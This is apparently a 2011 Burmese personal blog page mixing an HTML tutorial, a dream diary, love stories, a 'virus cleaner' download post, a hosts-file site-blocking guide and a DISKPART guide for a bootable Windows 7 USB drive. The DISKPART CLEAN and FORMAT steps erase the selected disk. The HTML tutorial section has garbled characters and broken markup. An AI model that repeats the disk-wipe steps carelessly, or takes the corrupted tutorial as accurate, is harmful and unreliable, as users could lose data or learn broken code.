Web Browser လို့ခေါ်တဲ့ ( internet Explorer / Firefox ) စတဲ့ browser တွေကတော့

အဲသည့် HTML documents တွေကို ဖတ်ပြီး web pages အနေနဲ့ဖေါ်ပြပေးတဲ-
browser တွေပါဘဲ ။

အဲသည့် browser တွေက HTML Tags တွေကို မဖေါ်ပြပေးပါဘူး ။

အဲသည့် Tags တွေကို ဘာသာပြန်ပေးပြီး Web pages အနေနဲ့သာပြပေးတာပ- ။

ကဲ ဥပမာလေးနဲ့ ကြည့်ရအောင်နော် ။

<html>
<body>

<h1><b>တော်ဝင်ချယ်ရီ</b></h- 1>

<p>တလွဲတွေလုပ်တတ်ေ-ာမိန်းမတစ်ယောက်ြ- စ်ပါသည်။ အသက်၂၉နှစ်ရှိပြါ-ီ။</p>

</body>
</html>

Example Explained

* <html> နှင့်</html> ကြားထဲကစာသားတွေက-ု Web Pages အနေနဲ့မြင်ရမှာဖြ-်ပါတယ် ။
* <body> နှင့်</body> ကြားထဲကစာသားကတော- page မှာရေးထားတာမြင်ရ-ှာဖြစ်ပါတယ် ။
* <h1> နှင့်</h1> ခေါင်းစဉ်အနေနြဲ့- င်ရမှာဖြစ်ပါတယ် ။ <b> </b> bold
လုပ်ထားခြင်းဖြစ်-ါသည်။
* <p> နှင့် </p> စာပိုဒ်အနေနဲ့မြင- ရမှာဖြစ်ပါတယ်။

တော်ဝင်ချယ်ရီ

တလွဲတွေလုပ်တတ်သေ- မိန်းမတစ်ယောက်ဖြ-်ပါသည်။ အသက်၂၉နှစ်ရှိပြါ-ီ။

ကဲ အောက်မှာ ဘယ်အရာတွေက ဘာအတွက်သုံးလဲ လေ့လာကြည့်ရအောင်- နာ်။

HTML ခေါင်းစဉ်ကို

HTML ခေါင်းစဉ်ကို <h1> to <h6> tags.လေးတွေနဲ့သတ်မှတ-်တယ် ။

Example

<h1>This is a heading</h1>
<h2>This is a heading</h2>
<h3>This is a heading</h3>

This is a heading
This is a heading
This is a heading

HTML Paragraphs

HTML စာပိုဒ်ကိုတော့ <p> </p> tag နဲ့သတ်မှတ်ပါတယ် ။

Example

<p>This is a paragraph.</p>
<p>This is another paragraph.</p>

This is a paragraph.

This is another paragraph.

HTML Links

HTML Links တွေကိုတော့ <a> </a> tag နဲ့ချိတ်ဆက်ပါတယ် ။

Example

span style="color: #ff0000;">a
href="http://www.w3schools.com"&gt;လင့်ချိတ်ရင်ပေါ်ခ- င်တဲ့နာမည်ကို
ဒီမှာရေးပါ</a>

HTML Links
HTML Links တွေကိုတော့ tag နဲ့ချိတ်ဆက်ပါတယ် ။
Example
လင့်ချိတ်ရင်ပေါ်ခ- င်တဲ့နာမည်ကို ဒီမှာရေးပါ

HTML Images

HTML ပုံတွေ ထည့်ချင်ရင်တော့ <img> </image> tag. နဲ့အသုံးပြုပါ ။

<img src="w3schools.jpg" width="104" height="142" > ၏

(အကျယ် ။ အမြင့်ကို လဲကြိုက်နှစ်သက်ရ- ချိန်လို့ရပါတယ် ။ ထည့်တဲ့
ပုံစံလေးကိုသာသေခ-ာလေ့လာထားပါ) ။

HTML Elements
An HTML element ဆိုတာကတော့ အစ Tag နဲ့ အဆုံး Tag ရှိကိုရှိရပါတယ် ။

HTML Elements

An HTML element ဆိုတာကတော့ အစ Tag နဲ့ အဆုံး Tag ရှိကိုရှိရပါတယ် ။

Start tag *

Element content

End tag *

<p>

This is a paragraph

</p>

<a href="default.htm" >

This is a link

</a>

<br />

* The start tag is often called the opening tag. The end tag is often
called the closing tag.

HTML Element Syntax

* An HTML element starts with a start tag / opening tag
* An HTML element ends with an end tag / closing tag
* The element content is everything between the start and the end tag
* Some HTML elements have empty content
* Empty elements are closed in the start tag
* Most HTML elements can have attributes

<br />

သည် element ကတော့ အဆုံးမရှိတဲ့ element တစ်ခုဖြစ်ပါတယ် ။ တစ်လိုင်းဆင်း
လုပ်ချင်ရင် သုံးပါတယ် ။ သူဟာ အဆုံးမရှိတဲ့ element ဖြစ်တဲ့အတွက်ကြော-့်
သူ့ကိုရေးရင် start tag ထဲမှာ တင် / လေး ခံရေးလိုက်ပါတယ် ။
<br />

Tuesday, May 31, 2011

မွန်လေး သို့ အိပ်မက်ည

အိပ်မက်ဆိုတော့လဲ အိပ်မက်လိုပါပဲ နိုးထလာချိန် တစ်ညလုံးမက်ခဲ့တဲ့ အကြောင်းရာတွေက တကယ်မဟုတ်မှန်းသိခဲ့ရတယ်။ အဲဒီညက ဘာအကြောင်းမှမတွေးပဲ မက်ခဲ့တဲ့ အိပ်မက်စစ်စစ်လေးတစ်ခုပေါ့။ အိပ်မက်စစ်လို့ပြောရခြင်းက ဒီလိုပါ တစ်ခါတရံတွေမှာ အိပ်ပျော်ခါနီးတွေးခဲ့တဲ့ အကြောင်းရာတွေဟာ စွဲလန်းစိတ်နဲ့ အိပ်မက်ဆိုတာကလဲ မက်တက်တယ်မလား ခုတော့ ကျွန်တော့်မှာ အလွတ်မက်တဲ့ အိပ်မက်စစ်စစ်ပေါ့ဗျာ။ကျွန်တော်သိပ်ချစ်ရဲ့တဲ့ ကောင်မလေးရှိတယ်ဗျ
တက္ကသိုလ်ကျောင်းသားဘ၀မှစပြီး ယခုထိတိုင်ပါပဲ အဲဒီအချိန်သူက သူ့ဖေဖေပြောင်းရွှေ့ရာအရပ် သရက်မြို့မှနေပြီး မကွေးသက္ကသိုလ်ကျောင်းတော်ကြီးမှာ အဆောင်နေပြီးတက်ခဲ့တယ် အဲဒီချိန်မှာ ကျွန်တော်ကလဲ မြစ်အနောက်ဘက်ကမ်း စကုမြို့ ဆိုတဲ့နေရာလေးမှာ နေပြီး မကွေးသက္ကသိုလ်မှာ အဆောင်နေေ ကျာင်းသားအဖြစ် တက်ခဲ့တယ်လေ။ ချစ်သူဖြစ်သွားခဲ့ကြတယ် ကျောင်းတွေပြီးလို့ ခွဲသွားကြရတယ် မကြာမကြာ တစ်လတစ်ခါလောက်တော့ ဖုန်းလာတက်ပါတယ် ကောင်မလေးဆီက အခုဆိုဖုန်းမလာတာလဲကြာပြီ။ အိပ်မက်က ခုမှစတာ…:D မှတ်မိတဲ့အပိုင်းစလေးတွေပါ ကောင်မလေးက ကျွန်တော်နဲ့ဝေးသွားတာကြာပြီလေ သူဘယ်မှာနေတယ်ဆိုတာတော့ သိပါတယ် အိပ်မက်မှာ ကျွန်တော်မေ့သွားတယ် သူတကယ်လက်ရှိနေထိုင်ရာအ၇ပ်ကို။အိမ်မက်ထဲမှာ သူရောက်နေတဲ့အရပ်က
ကျွန်တော့်အိမ်နဲ့ကပ်နေတယ် ခေါင်းရင်းဘေးအိမ်ဖြစ်နေခဲ့တယ် ကောင်မလေးတို့မိသားစု အဲဒီမှာ အိမ်ငှားနေကြတယ်။ ကျွန်တော် မသိခဲ့ဘူး အဲဒီမှာနေတာ တစ်နှစ်ခန့်လောက်ကြာနေပြီပေါ့ အကြောင်းတစ်ခုခုကြောင့် သူဒီမှာရှိနေတာကို သိလိုက်ရချိန် ကျွန်တော် သွေးပျက်သွားသလို ရင်တွေအရမ်းခုန်စေခဲ့တယ် တစ်နှစ်လောက်အကြာတောင် ကျွန်တော်နားမှာ သူရှိနေတာကို မသိခဲ့ဘူး (ကောင်မလေးမှာ အကျင့်ရှိပါတယ် ကျောင်းတက်စဉ် အိမ်မှာနေတာတွေမှအစ အပြင်ထွက်လေ့မရှိဘူးလေ) သူကျွန်တော့်နားမှရှိရတဲ့အကြောင်းရင်းက ဒီလိုပါ သူ့မိဘတွေက ဓါတ်ပုံ print ထုပ်ဖို့ဆိုပြီး ကျွန်တော်ဆီ အဲဒီပုံတွေေ ရာက်လာတော့တာပါပဲ အဲဒီပုံတွေကြည့်ပြီး ကျွန်တော် အချိန်ကြာ အံ့အားသင့်နေခဲ့မိတာပေါ့။ စုံစမ်းကြည့်လိုက်တော့မှ ကောင်မလေးတို့မိသားစုဟာ ကျွန်တော့် အိမ်ဘေးမှာနေတာ သိလိုက်ရတယ် ကျွန်တော်လည်း အိမ်ကမိဘတွေကိုပြောပြလိုက်ပါတယ်။ အဲလိုနဲ့ ဓါတ်ပုံတွေ print ထုပ်ပေးလိုက်တယ်။ ဒီလိုနဲ့ကျွန်တော်သိပ်ချစ်ရဲတဲ့ကောင်မလေးနဲ့ ပြန်ဆုံရဖို့ကြိုးစားပါတော့တယ်။ သူဖေဖေ ရုံးသွားတယ် အိမ်မှာ
ကောင်မလေးတို့မိသားစု ကျန်နေခဲ့တယ် ကောင်မလေးမေမေကလဲ ဈေးသွားသုံးတယ်လေ အိမ်မှာ ညီမနှစ်ယောက် ကျန်နေခဲ့တယ် ဒါနဲ့ ကျွန်တော် ခြံဝန်းနားကပ်ပြီး အခြေနေကြည့်နေတယ် ကောင်မလေး ညီမနဲ့တွေ့တယ် ကောင်မလေး ညီမကလဲ ကျွန်တော်တို့ချစ်သူတွေ ဖြစ်နေတာဆိုတာ သိထားပြီးသားပါ။ တကယ်ဆို မကောင်းဘူးဗျာ (ကျွန်တော့်အိမ်အနားမှာသူရောက်လာတာ တစ်နှစ်ခန့်လောက်ရှိနေပြီ ကျွန်တော့်ကို အသိမပေးဘူး သူဒီတိုင်းနေနိုင်ခဲ့တယ် )နောက်ပိုင်းမှာတော့ ကျွန်တော် သူနဲ့မကြာမကြာတွေ့ဖို့ ကြိုးစားခဲ့တယ် ကြာလာတော့ မိဘတွေသိလာတယ် နှစ်ဘက်လုံး သဘောတူကြပါတယ် ကျွန်တော့်အိမ်ကိုလဲ ကောင်မလေးလာလည်ပါတယ် ကျွန်တော် သူ့ကိုအိမ်ပြန်မလွတ်ချင်တော့ဘူး အိမ်ချင်းကလဲ ကပ်နေတယ် လူကြီးတွေလဲသဘောတူပြီးသား သို့သော် ဘာကြောင့်လဲမသိဘူး ကောင်မလေးကို အိပ်ပြန်မလွတ်ချင်တော့ဘူးပေါ့….ကျွန်တော်နားက ထွက်ခွားသွားမှာ အပြီးပျောက်ကွယ်သွားမှာကိုကြောက်နေလို့ပါပဲ ..အဲလိုနဲ့ အဲလိုနဲ့ ကျွန်တော် အိပ်ရာက နိုးထချိန်ဖြစ်မယ်ထင်တယ် အသိစိတ်တစ်ခုပေါ်လာတယ် ဖုန်နံပါတ်တစ်ခုပါ သူ့ဖုန်းနံပါတ်က(------)ပါ လက်ရှိသူရှိနေတဲ့အရပ်က(-------)ဖုန်းနံပါတ်ကုတ်တွေလဲမတူဘူးလေ ဒါတစ်ခုခုလွဲမှားနေတာဆိုတာ ကျွန်တော်သိလိုက်ချိန်မှာ အိပ်ရာက နိုးထလာပါပြီ ကျွန်တော်အိပ်မက်မက်နေခဲ့တာပါပဲ…တကယ်ပဲ ကျွန်တော်အနားမှာ သူမရှိဘူး မိုင်းချီဝေးတဲ့နေရာမှာ ကောင်မလေးတကယ်ရှိနေခဲ့တာပါပဲ။ ဝေးနေရမှာကြောကလို့ ဝေးနေရတာလား အနာမှတဖ၀ါးမှ မခွာရှိနေချင်ခဲ့လို့လား….အိမ်မက်ဟာ အိမ်မက်တိုင်းပဲ နံနက်မိုးလင်းချိန်မှာ တကယ်မဟုတ်မှန်းသိခဲ့ရတယ် မကြာပါဘူး ကျွန်တော်လည်း ဆိုင်ဖွင့်ဖို့အတွက် အိပ်ရာမှထပြီး နေ့စဉ်လုပ်စဉ်အတိုင်းလုပ်ရင်း အလုပ်မှာ လုပ်နေခဲ့ရပါပြီ။ ဒီအိပ်မက်ညဟာ ကျွန်တော့်အတွေးတွေကို ဒီလောက်နဲ့တင်ရပ်တန့်စေမှာမဟုတ်ပါဘူး။

Friday, May 27, 2011

usb thumb drive သုံးပြီးပြီ window install လုပ်မယ်

windows အသစ်တင်ခါနီးကြရင် cd/dvd drive တွေ မကောင်းလို့ စိတ်ညစ်ရတာမျိုးတွေ ကြုံဖူးကြမှာပါ။ နောက်တခါ တစ်ချို့ netbook တွေမှာ cd/dvd drive တွေ မပါလာတာမျိုးတွေ လည်းရှိတတ်ပါတယ်။ အဲဒီလို အခြေနေတွေ ကြရင် usb thumb drive ကို အသုံးပြုပြီးတော့ ကိုယ့်စက်ထဲကို windows install လုပ်လို့ရပါတယ်။ usb thumb drive ရဲ့ ပမာဏ အနည်းဆုံး 4G ဖြစ်ရပါမယ်။ usb thumb drive ကို format လုပ်ရမှာ ဖြစ်တဲ့အတွက် ဒေတာတွေကိုတော့ တနေရာမှာ ကူးယူထားဖို့ လိုအပ်ပါတယ်။ အောက်မှာ ပြုလုပ်တဲ့အဆင့်တွေက Windows 7 တင်ထားတဲ့ စက်မှာ ပြုလုပ်တာပါ။ install
လုပ်မယ့် windows ကလည်း windows 7 ပါပဲ။
. usb thumb drive ကို စက်ထဲမှာထိုးလိုက်ပါ။ ပြီးရင် Start menu > All
programs > Accessories ထဲကနေ Command Prompt ပေါ်မှာ right click
နှိပ်ပြီးတော့ Run as administrator ကို ရွေးလိုက်ပါ။ ဒါဆိုရင်တော့
Command Prompt ကျလာမှာ ဖြစ်ပါတယ်။
၂. အဲဒီ Command Prompt ထဲမှာ DISKPART လို့ ရိုက်ပြီး Enter နှိပ်ပါ။
နောက်ထပ် Console window တစ်ခု ထပ်ပေါ်လာပါလိမ့်မယ်။ အဲဒီမှာ အောက်က
အဆင့်အတိုင်း လုပ်ပါ။
၃. ပြီးရင် LIST DISK လို့ရိုက်ပြီး Enter နှိပ်ပါ။ ကိုယ့်ရဲ့ စက်ထဲမှာ
ရှိတဲ့ disk တွေ အကုန်ပြပါလိမ့်မယ်။ အဲဒီမှာ သေချာ ကြည့်ပါ။ ကိုယ့် us
thumb drive ရဲ့ နံပါတ်က ဘယ်လောက်လည်းဆိုတာ။ ကျွန်တော့်စက်မှာဆိုရင် DISK
0 က Hardisk ပါ။ DISK 1 က usb thumb drive ပါ။ ဘေးမှာ disk size ကို
ပြထားတဲ့အတွက် အလွယ်တကူခွဲလို့ရပါတယ်။
၎. usb thumb drive ရဲ့ disk no ကို သိပြီဆိုရင် SELECT DISK 1
လို့ရိုက်ပါ။ (ကျွန်တော့်စက်မှာ usb thumb dirve က DISK 1 မလို့ SELECT
DISK 1 လို့ရိုက်တာပါ။ တကယ်လို့ ကိုယ့်စက်မှာ တခြား disk no ဆိုရင် အဲဒီ
နံပါတ် အလိုက်ရိုက်ပေးရမှာပါ)
၅. ပြီးရင်တော့ အောက်က အဆင့်တွေ အတိုင်း ရိုက်ပေးရမှာပါ။
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS ( usb drive ကို format လုပ်တာပါ။ မိနစ် အနည်းငယ် စောင့်ရပါတယ်)
ASSIGN
EXIT (DISKPART Console ကနေ ထွက်တာပါ။ မူလ Command Prompt ကတော့
ကျန်နေပါသေးတယ်။ အဲဒီ command prompt ကို မပိတ်သေးပါနဲ့ )
၆. အပေါ်က အဆင့် ပြီးရင်... DVD drive ကောင်းတဲ့ စက်တစ်လုံးထဲမှာ windows
7 ခွေကို ထည့်။ ပြီးရင် အဲဒီခွေထဲက BOOTSECT.EXE ကို အသုံးပြု ပြီးတော့
usb thumb drive ကို bootable ဖြစ်အောင် လုပ်ရပါမယ်။ ကောင်းတာကတော့ အပေါ်က
အဆင့်တွေကိုလည်း DVD Drive ကောင်းတဲ့ စက်တစ်လုံးလုံးမှာ
ပြုလုပ်သင့်ပါတယ်။ usb thumb drive ကို ဖြုတ်လိုက် တပ်လိုက်
လုပ်စရာမလိုတော့ဘူးပေါ့။ ပြီးရင် Command Prompt ထဲကနေ အောက်က Command
တွေကို ရိုက်ပါ။
CD \
D: (DVD drive letter ကို ရိုက်ပေးရမှာပါ။ ကျွန်တော့်စက်မှာ dvd drive က
D ဖြစ်နေလို့ပါ။)
CD BOOT
BOOTSECT.EXE /NT60 H: (ကျွန်တော့်စက်မှာ thumb drive letter က H ပါ။
အဲဒီနေရာမှာ ကိုယ့် thumb drive letter ကို ရိုက်ပေးရမှာပါ။)
၇. အပေါ်က အဆင့်တွေ အားလုံး ပြီးသွားပြီဆိုရင် ကိုယ့် usb thumb drive က
bootable drive ဖြစ်သွားပါပြီ။ နောက်အဆင့် အနေနဲ့ windows 7 ကို usb
thumb drive ထဲကို ကူးထည့်ပေးရမှာပါ။ DVD drive ကောင်းတဲ့
စက်တစ်လုံးထဲမှာ windows 7 ခွေကို ထည့် ပြီးရင် အဲဒီ ခွေထဲ အားလုံးကို
ခဏနေက usb thumb drive ထဲကို ကူးထည့်လိုက်ရုံပါပဲ။ အဲဒါဆိုရင်တော့
bootable ဖြစ်တဲ့ Windows 7 ပါတဲ့ usb thumb drive တစ်ခု ကို ရမှာပါ။
၈. ကိုယ် windows တင်မယ့် စက်ရဲ့ bios ထဲမှာ first boot ကို usb drive
ကို ထားပေးရပါမယ်။ ပြီးရင် usb thumb drive ကို အသုံးပြုပြီးတော့ windows
တင်လို့ ရပါပြီ။
တစ်ခြား Windows အတွက်တော့ အနည်းငယ် အပြောင်းလဲ ရှိမယ် ထင်ပါတယ်။ Windows
7 တော့ အိုခေပါတယ်။

Saturday, May 21, 2011

Virus အသစ်

ညစဉ် ညစဉ် ကျွန်တော့်ရဲ့စိတ် အတွေးထဲက အလွမ်းတွေကို virus လို့အမည်ပေးလိုက်မိတယ်ဗျာ။ အလွမ်း virus ကိုသက်ဖို့အတွက် အဲဒီ Software က ကျွန်တော်နဲ့ မိုင်ချီဝေးတဲ့ နေရာမှာ ရောက်နေပြီ။ ခုချိန်မှာ Search Engine တွေဟာ အသုံးမတဲ့ပြန်ပါလား။ အားလပ်ချိန်လေးတွေ တွေးမိတိုင်း အလွမ်းဆိုတဲ့ ခေါင်းစဉ်ကို ဦးတည်နေတော့တာပါပဲ ကျွန်တော်ပျံသန်းနေပါတယ် သူရှိတဲ့အရပ်ကိုလေ… မုန်တိုင်းနဲ့ ပင်လယ်တွေ ဖြတ်သန်းနေရတဲ့အတွက် အချိန်တွေကြာမြင့်နေခဲ့ရပါတယ်။ အဲဒီအလွမ်း Virus သေဖို့ဆိုတာကျွန်တော်ရင်ခွင်မှာ ချစ်သူရှိနေဖို့ပါပဲ။ ရင်ချိန် အတူလျောက်ခဲ့ဘူးတဲ့ လမ်းတွေနဲ့ ပြောခဲ့တဲ့စကားတွေ သူမေ့များနေမလား ဆိုတဲ့ အတွေကလည်း စိတ်မှာ တစ်ချက်တစ်ချက် ၀င်ဆောင့်နေသေးရဲ့။ ကျွန်တော့်တောင်ပံတွေမှာ အလွမ်း ဗိုင်းရပ်စ် ကိုက်ခံထားရလို့ အားအင်တွေ မကြာမကြာမှေးမှိန်တက်တယ် ဒါပေမဲ့လည်း ရှိတဲ့အားတွေနဲ့ ထက်ပြီး ပြန်သန်းနေရတယ် ခရီးတစ်ခုရောက်ရင်တော့ အနာဂတ်အတွက် အားတွေဟာ အတိုင်းဆမဲ့ ပြန်ပြည့်လာလိမ့်မယ်ဆိုတာ ကိုယ့်ကိုယုံကြည့်တယ်။ သတိရမှုတွေထဲက တစ်ခုက သက္ကသိုလ်စာမေးပွဲဖြေခါနီးချိန်ပေါ့ ကျွန်တော်စာကျက်ပျင်းလို့ဆိုပြီးလေ သူဘေးက ကျွန်တော့် Subject တွေကို ရွက်ဆိုပြတက်တယ် သူကကျွန်တော့်ထက်အတန်းကြီးတယ် မာစတာတန်းပြီးမဲ့အချိန်ပေါ့။ သတိရစရာအစိတ်အပိုင်းတွေက များလွန်းလှပါတယ် ဒါပေမဲ့ သူနဲ့ အချိန်ကြာ နှစ်တွေကြာဝေးရမဲ့ ညတစ်ညမှတော့ သူပြောခဲ့တဲ့စကားလေးတစ်ခွန်း "နင်က ငါ့ကိုအရမ်းချစ်တာပဲ ငါ့အဖေလောက်ကိုချစ်တယ်နော်"တဲ့ ကျွန်တော်အရမ်းချစ်မှန်းသူသိပါတယ် ဘာကြောင့်အဲလောက်ကြာဝေးနေရတာလဲ စကားတစ်ခွန်းကြားယောင်မိတယ် အချစ်စစ်တို့မည်သည် ခက်ခဲတက်တယ်ဆိုလားဗျာ တော်တော်ကိုပေါင်းစပ်ဖို့ခက်ခဲပါတယ် မပေါင်းစပ်ရမှာကိုပဲ ကြောက်နေမိတယ်၊ ခုဆိုရင် မကြာမကြာတွေးမိတယ် လွမ်းမိတယ်ပေါ့ဗျာ ဒါကြောင့် ကောင်မလေး အလွမ်း virus ကို မင်းသက်မှဖြစ်တော့မယ်နော်….ပုံပြင်လေးကတော့ ဒါပါပဲကွယ်…..:D

Monday, May 16, 2011

Ok Virus cleaner

Virus Cleaner များ
နှိမ်နှင်းနိုင်တဲ့ virus အမျိုးအစားမှာ အောက်ပါအတိုင်းဖြစ်ပါတယ်
ati2avxx Cleaner
Chrome Cleaner
Driver Guard
Explorer.exe Cleaner
Fansy Cleaner
Fun Cleaner
Funny Cleaner
Globle Cleaner
Happy Birthday Cleaner
KillVBS Cleaner
အောက်တွင်ဒေါင်းလုပ်လင့် (1)
http://ifile.it/lzbia68/Virus%20Cleaner1.rar

Virus Cleaner 2
Kolay.vbs Cleaner
Loikaw Cleaner
Magway FC Cleaner
Nargiz Cleaner
REcycler Cleaner
regsvr Cleaner
Svchost Cleaner
TayatMyo Cleaner
Univbs Cleaner
Virus Cleaner Guide
အောက်တွင် ဒေါင်းလုပ်လင့် (2)
http://ifile.it/0o1x2nc/Virus%20Cleaner%202.rar
software မှာလိုအပ်တဲ့ password တွေကိုတော့ JPEG နဲ့ဖော်ပြထားပါတယ်
ပုံတွင်ကြည့်လိုက်ပါ
အဆင်ပြေကြပါစေ virus အန္ဒရာယ်မှကင်းဝေးကြပါစေ။

Cmd ကနေ ဆိုဒ်တွေကို Block မယ်

ကျွန်တော်တို့ ကျောင်းတွေမှာပဲဖြစ်ဖြစ်၊ အိမ်တွေမှာပဲဖြစ်ဖြစ် Admin Account ကနေ မိမိမလိုချင်တဲ့၊ ကလေးငယ်တွေပဲဖြစ်ဖြစ် မကြည့်စေချင်တဲ့ Web Site တွေကို Software မသုံးပဲပိတ်ထားလို့ ရပါတယ်။ လုပ်ရတာလည်း လွယ်ကူရိုးရှင်းတဲ့အပြင် Site တွေကိုလည်း အကန့်အသတ်မရှိ ပိတ်နိုင်တဲ့အတွက် အားလုံးပဲ လိုအပ်ရင် အသုံးပြူလို့ရအောင် ဝေမျှလိုက်ပါတယ်။
*လုပ်နည်း*
1. *Start* >> *Cmd* ကိုဖွင့်လိုက်ပါ။ (Adminstrator ဖြစ်ဖို့တော့လိုပါတယ်။
Window XP မှာဆိုရင်တော့ Start >> Run >> Cmd ကိုဝင်လိုက်ပါ။)
2. *notepad C:/Windows/System32/drivers/etc/hosts* ကို Cmd (Commmand Prompt
) ထဲမှာ အတိအကျရိုက်ထည့်လိုက်ပါ။
<http://1.bp.blogspot.com/-Ji5i4MNt8RQ/TbGvYUInvdI/AAAAAAAAAcQ/FM4QHT2...>
3. ကျလာတဲ့ Notepad ဖိုင်လေးရဲ့ အောက်ဆုံးနားမှာ *127.0.0.1
ပိတ်ချင်တဲ့လိပ်စာ*ကို ရိုက်ထည့်ပေးလိုက်ပါ။ ကျတော်ကတော့ ဥပမာအနေနဲ့
facebook နဲ့ပြထားပါတယ်။
<http://2.bp.blogspot.com/-wVJ5kq6Y3qM/TbGvco6m8II/AAAAAAAAAcU/Wlb7V_9...>
4. *Save* ပြီး ပိတ်လိုက်ပါ။ Cmd ကိုလည်း *Exit* လုပ်လိုက်ပါ။
5. ဒါဆို Facebook ကိုဝင်လို့မရတော့ပါခင်ဗျာ။
တကယ်လို့ *ပြန်ဝင်ချင်တယ်ဆိုရင်တော့ (127.0.0.1 ပိတ်ချင်တဲ့လိပ်စာ ) လေးကို
ပြန်ဖျက်ပေးလိုက်ပါ။* ဒါဆိုပြန်ဝင်လို့ ရပါပြီ။
အဆင်ပြေကြပါစေခင်ဗျာ။

Wednesday, May 11, 2011

ကောင်လေးနဲ့ ကောင်းမလေး

မိုး မသဲ ပေမဲ့ မိုး မစဲသေးပါဘူး ညကမှောင်မှိုက်လို့ ဆိုင်လေးတစ်ခုအတွင်းမှာ အတူရှိနေခဲ့ကြတာပေါ့ "ကောင်လေး" စကားစပြောတယ် မင်း ကိုယ်နဲ့တစ်ခါတွေ့ပြီးကတည်းက ဘယ်ပျောက်သွားလဲ "ကောင်မလေး" ကပြန်ပြောတယ် မျက်နှာပူလို့ ထပ်မလာဖြစ်တာပါ မျက်နှာပူစရာက သူတို့နှစ်ယောက်ပဲသိမှာပါ "ကောင်လေး" က ငါမှာ မင်းကိုမျှော်နေခဲ့ရတာ ငါ့ရင်ခွင်ထဲမင်း အပြီးအပိုင်များထွက်သွားလား အတွေးတွေနဲ့ သတိရနေခဲ့ရတယ်... မိုးက သူတို့ ဆိုင်ထဲမှာရှိနေချိန်မှာပဲ ပိုလို့သာရွာလာပြန်တယ်။ "ကောင်မလေး" က သူ့ချစ်သူ ကောင်လေး ပခုံးမှာ ခေါင်းလေးမှီလို့ပေါ့ အတွေးတွေနဲ့ နှစ်ယောက်သား စကားမဆက်ဖြစ်ပဲ ခဏလောက် ငြိမ်နေခဲ့ကြတယ်။ ညက တစ်ဖြေးဖြေးနဲ့ မှောင်လာပြန်တယ် သူတို့တွေ စားသောက်ပြီး ဆိုင်အပြင်ကို ကြည့်လိုက်တော့ မိုးစက်တွေ မရှိတော့ဘူး "ကောင်းလေး" က ပြန်ရအောင် ဆိုပြီး သူ့ဘေးက ချစ်သူကိုပြောလိုက်တယ် .. ဒီလိုနဲ့ ချစ်သူနှစ်ယောက် ဆိုင်အပြင်ထွက်လာကြတယ် အိမ်မပြန်ဖြစ်ကြသေးပါဘူး သူတို့ ကြည်နူးစရာ နေရာလေးတစ်ခုကို ရွေးချယ်ပြီး ခဏအချိန်ဖြုန်းလိုက်တယ် "ကောင်လေး" က ကောင်မလေး ပါးပြင်ကို ညင်သာစွာ နမ်းရှိုက်လိုက်ပြီးနောက် ချစ်သူနှစ်ဦးမှာ ရင်ခုန်သံတွေ ပူနွေးလာကြပြီလေ .. တစ်ယောက်ကို တစ်ယောက်
ညင်သာစွာ ပွေ့ဖက်ထားပြီး အချိန်ကို ကုန်လွန်စေခဲ့တယ်။ ကောင်လေး ရင်ထဲမှာ အဓိပ္ပါယ်မျိုးစုံ ပုံဖော်ကြည့်နေသည်။ ဘာကြောင့်လည်းဆို ကောင်လေးက သူ့ချစ်သူ ဟာ ငါပိုင်ရမဲ့ ချစ်သူမဟုတ်ဘူး အသိနဲ့ပါပဲ။ ဒီလိုပါ ကောင်မလေးက အိမ်ထောင်ရှိခဲ့ဘူးတာကို သူ့ကို မပြောပြခဲ့ဘူး ကောင်လေး သိလိုက်ရချိန်ဟာ မကြာသေးပါဘူး ကောင်မလေးကိုလဲ သူသိတာ မပြောပြခဲ့မိဘူးလေ ဒါဆို သူ့ခေါင်းထဲမှာ အတွေးများစွာနဲ့ပေါ့။ နံနက် (၉)နာရီထိုးမှာ ကောင်မလေး ကောင်လေးဆီကို ရောက်လာပါတယ် ...နောက်ပိုင်း ချစ်သူနှစ်ဦး ဘာဆက်ဖြစ်သွားကြလဲ....??? ရှေ့ဆက်ဖို့အတွက် အားအင်ပြည့်တဲ့ ခြေလှမ်းတွေ လှမ်းနေလား ...?

Wednesday, April 20, 2011

iPixsoft slide show creator

flash slideshow လုပ်တဲ့ software တစ်ခုပဲ။ အားသာချက်တွေ ရှိပါတယ် (ကိုသံလုံငယ်) က ဒီလိုပြောထားပါတယ်။
၁။ file size သေးပြီး အသုံးပြုရတာလည်း ပေါ့ပါးပါတယ်။
၂။ ပုံတစ်ပုံနဲ့ တစ်ပုံကြား transforming ကို auto ထည့်ပေးလို့ slide show တစ်ခုလုပ်ဖို့ အရမ်းမြန်တယ်။
၃။ slide show ရဲ့ output ကို swf, html, executable (double click နှိပ်ယုံနဲ့ player မလိုပဲ open ပေးနိုင်တဲ့ဖိုင်), screen saver အပြင် email နဲ့ ပို့နိုင်အောင်ပါ ပြန်ထွက်ပေးထားတယ်။
၎။ slide show ရိုးရိုးမဟုတ်ပဲ play, pause, photo view, replay
စတဲ့ခလုပ်တွေ အလိုလိုထည့်ပေးပါတယ်။ Software ပါတင်ပေးထားပါတယ်။ ပထမဆုံး set up ဆိုတာကို run ပြီး application ကို install လုပ်ပါ။ ပြီးမှ template ကို ထပ် run ပေးလိုက်ပါ။ အလွယ်သုံး software တွေဖြစ်လို့ သဘောလောက်ပဲ ထပ်ပြောပြပါ့မယ်။
၁။ install လုပ်ပြီးလို့ ဖွင့်လိုက်တာနဲ့ main menu ပေါ်လာမှာပါ။ New ဆိုတာကိုသာ နှိပ်လိုက်ပါ။
၂။ window box တစ်ခုပွင့်လာပြီး သုံးချင်တဲ့ ဓါတ်ပုံတွေ ရွေးခိုင်းပါလိမ့်မယ်။ အဲလိုမပေါ်ခဲ့ရင်လည်း ဘယ်ဘက်အပေါ်ဒေါင့်က မျဉ်းသားပြထားတဲ့ add ကိုနှိပ်ပါ။ မိမိသုံးချင်တဲ့ပုံတွေ ရွေးပြီး ၀ိုင်းပြထားတဲ့ Add ကိုနှိပ်ပါ။
၃။ ပုံတွေရောက်သွားပါပြီ။ အောက်ခြေမှာ tab menu လေးခုရှိပါတယ်။ ပုံထည့်ပြီးတာနဲ့ photo ဆိုတဲ့ tab ထဲကိုရောက်သွားပြီပေါ့။ တစ်ပုံချင်းစီကိုထောက်ပြီး ညာဘက်က option တွေနဲ့ ပုံကို edit လုပ်လို့ရပါသေးတယ်။ မလုပ်ချင်လည်း ကျော်သွားနိုင်ပါတယ်။ နောက်တစ်ဆင့်အတွက် နောက် tab တစ်ခုကို နှိပ်လိုက်ပါတယ်။
